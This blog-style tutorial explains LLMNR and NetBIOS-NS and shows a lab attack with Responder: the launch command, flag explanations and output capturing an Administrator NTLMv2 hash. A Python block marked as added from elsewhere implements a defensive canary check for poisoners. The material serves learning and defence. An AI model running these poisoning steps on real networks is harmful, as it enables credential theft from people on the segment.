LLMNR and NetBIOS-NS Poisoning

alixan · 2 min read · Oct 17, 2021

What is LLMNR and NetBIOS-NS?

NetBIOS: Network Basic Input/Output System (NetBIOS) is an API that allows computers on the local network to communicate with each other.

NetBIOS-NS: the name service that NetBIOS uses for name resolution. It works only over IPv4.

LLMNR: Link-Local Multicast Name Resolution (LLMNR) is a DNS-based name resolution protocol for Windows environments that works over both IPv4 and IPv6. It is supported on Windows Vista and later Windows operating systems.

Execution of the Attack

In the attack we will use a tool called Responder: https://github.com/SpiderLabs/Responder

Responder listens for name-resolution requests from the victim machine, answers them, and imitates various servers so that the victim tries to authenticate to it.

First we start Responder; it can also be started with just the parameter -I eth0:

responder -I eth0 -rdwv
  • -rdwv: -r and -d are the parameters required to respond to additional services; -v makes the output more readable.
  • The -w parameter enables the WPAD proxy, which is used in MITM attacks against the WPAD protocol.

I'm going to make a false request via a file share from a machine in the Active Directory lab.

Since the name the victim machine asks for is not registered in the Domain Controller's DNS, the lookup fails and the machine falls back to an LLMNR broadcast. It does not matter what name we type, as long as it is not registered in the Domain Controller.
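The two passages above (LLMNR being "DNS-based", and the victim falling back to a broadcast that anyone on the link can answer) are easier to see on the wire. The following is an added example, not code from the post or from the Responder project: it builds an LLMNR query in the DNS message layout that RFC 4795 reuses, parses a response, and turns the weakness into a detection, a "canary" query for a name that is known not to exist, so that any answer identifies a host poisoning name resolution on the segment. The name `canary`, the transaction ID 0x1234 and the sample reply bytes are constructed; the address 192.168.100.201 is the Responder IP from the output above.

```python
"""Added example (not from the original post or the Responder project): an
offline look at the LLMNR wire format and a defender-side 'canary' check.

LLMNR (RFC 4795) reuses the DNS message layout on UDP port 5355, sent to the
multicast group 224.0.0.252. Nothing authenticates the answer, so any host on
the link can reply to a query for a name nobody owns; that is what the
poisoning in the post relies on. A defender can turn this around: query a name
that is known not to exist and treat any answer as a poisoner on the segment.
"""
import socket
import struct

LLMNR_GROUP = "224.0.0.252"   # link-local multicast group used by LLMNR
LLMNR_PORT = 5355


def build_llmnr_query(name: str, txid: int) -> bytes:
    """DNS-style header (ID, flags=0 for a query, QDCOUNT=1, AN/NS/AR=0),
    then the question: length-prefixed labels, QTYPE=A (1), QCLASS=IN (1)."""
    header = struct.pack("!HHHHHH", txid, 0, 1, 0, 0, 0)
    qname = b"".join(bytes([len(lbl)]) + lbl.encode("ascii")
                     for lbl in name.split(".")) + b"\x00"
    return header + qname + struct.pack("!HH", 1, 1)


def _read_name(data: bytes, off: int):
    """Decode a DNS-style name at `off`, following RFC 1035 compression
    pointers. Returns (name, offset just past the name field)."""
    labels = []
    while True:
        ln = data[off]
        if ln & 0xC0 == 0xC0:                       # 2-byte pointer to an earlier name
            ptr = struct.unpack("!H", data[off:off + 2])[0] & 0x3FFF
            tail, _ = _read_name(data, ptr)
            labels.extend(tail.split("."))
            return ".".join(labels), off + 2
        off += 1
        if ln == 0:                                 # root label terminates the name
            return ".".join(labels), off
        labels.append(data[off:off + ln].decode("ascii"))
        off += ln


def parse_llmnr_response(data: bytes):
    """Return (txid, queried name, [IPv4 addresses from A answers]).
    Raises ValueError for packets that are too short or are not responses."""
    if len(data) < 12:
        raise ValueError("packet shorter than the 12-byte header")
    txid, flags, qdcount, ancount, _, _ = struct.unpack("!HHHHHH", data[:12])
    if not flags & 0x8000:                          # QR bit clear: this is a query
        raise ValueError("not a response")
    if qdcount != 1:
        raise ValueError("expected exactly one question")
    name, off = _read_name(data, 12)
    off += 4                                        # skip QTYPE and QCLASS
    answers = []
    for _ in range(ancount):
        _, off = _read_name(data, off)              # owner name (often a pointer)
        rtype, _rclass, _ttl, rdlen = struct.unpack("!HHIH", data[off:off + 10])
        off += 10
        rdata = data[off:off + rdlen]
        off += rdlen
        if rtype == 1 and rdlen == 4:               # A record
            answers.append(socket.inet_ntoa(rdata))
    return txid, name, answers


def is_poisoned(canary: str, txid: int, response: bytes) -> bool:
    """A canary is a name we know does not exist. A response that matches our
    transaction ID and name and carries an address means some host is
    answering for names it does not own."""
    rid, rname, answers = parse_llmnr_response(response)
    return rid == txid and rname.lower() == canary.lower() and bool(answers)


# Constructed sample: the reply a poisoner would send for the canary "canary",
# pointing it at 192.168.100.201 (the Responder IP shown in the post's output).
SAMPLE_POISONED_REPLY = bytes.fromhex(
    "1234" "8000" "0001" "0001" "0000" "0000"    # ID, flags (response), QD=1, AN=1
    "06" "63616e617279" "00" "0001" "0001"       # question: "canary", A, IN
    "c00c" "0001" "0001" "0000001e" "0004"       # answer: pointer to offset 12, A, IN, TTL 30, len 4
    "c0a864c9"                                   # 192.168.100.201
)


def probe(canary: str, txid: int = 0x1234, timeout: float = 2.0):
    """Live check (not exercised offline): multicast the canary query and
    return the source addresses of any hosts that answered it."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(timeout)
    sock.sendto(build_llmnr_query(canary, txid), (LLMNR_GROUP, LLMNR_PORT))
    suspects = []
    try:
        while True:
            data, (src, _) = sock.recvfrom(1024)
            if is_poisoned(canary, txid, data):
                suspects.append(src)
    except socket.timeout:
        pass
    finally:
        sock.close()
    return suspects


if __name__ == "__main__":
    print(is_poisoned("canary", 0x1234, SAMPLE_POISONED_REPLY))   # True
```

Run as-is it only evaluates the constructed reply; `probe("some-name-that-does-not-exist")` sends a real canary query on the default interface and returns the addresses of anything that answered, which on a healthy segment is an empty list. The same idea applies to NBT-NS on UDP port 137, and the long-term fix is to disable LLMNR and NetBIOS over TCP/IP by policy so the fallback never happens.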

responder -I eth0 -rdwv
[Responder ASCII-art banner]
NBT-NS, LLMNR & MDNS Responder 3.0.6.0
Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
DNS/MDNS [ON]
[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [ON]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]
[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Fingerprint hosts [OFF]
[+] Generic Options:
Responder NIC [eth0]
Responder IP [192.168.100.201]
Challenge set [random]
Don't Respond To Names ['ISATAP']
[+] Current Session Variables:
Responder Machine Name [WIN-TUWG92WLJ8N]
Responder Domain Name [2N0L.LOCAL]
Responder DCE-RPC Port [46021]
[+] Listening for events...
[*] [NBT-NS] Poisoned answer sent to 192.168.100.101 for name (service: File Server)
[*] [LLMNR] Poisoned answer sent to 192.168.100.101 for name
[*] [LLMNR] Poisoned answer sent to 192.168.100.101 for name
[SMB] NTLMv2-SSP Client : 192.168.100.101
[SMB] NTLMv2-SSP Username : alixan\Administrator
[SMB] NTLMv2-SSP Hash : Administrator::DCAX1:f2501f1d591a27d[hash truncated]

As we can see, we were able to capture the username and the NTLMv2 hash.

References:
https://www.techtarget.com/searchnetworking/definition/NetBIOS
https://en.wikipedia.org/wiki/Link-Local_Multicast_Name_Resolution
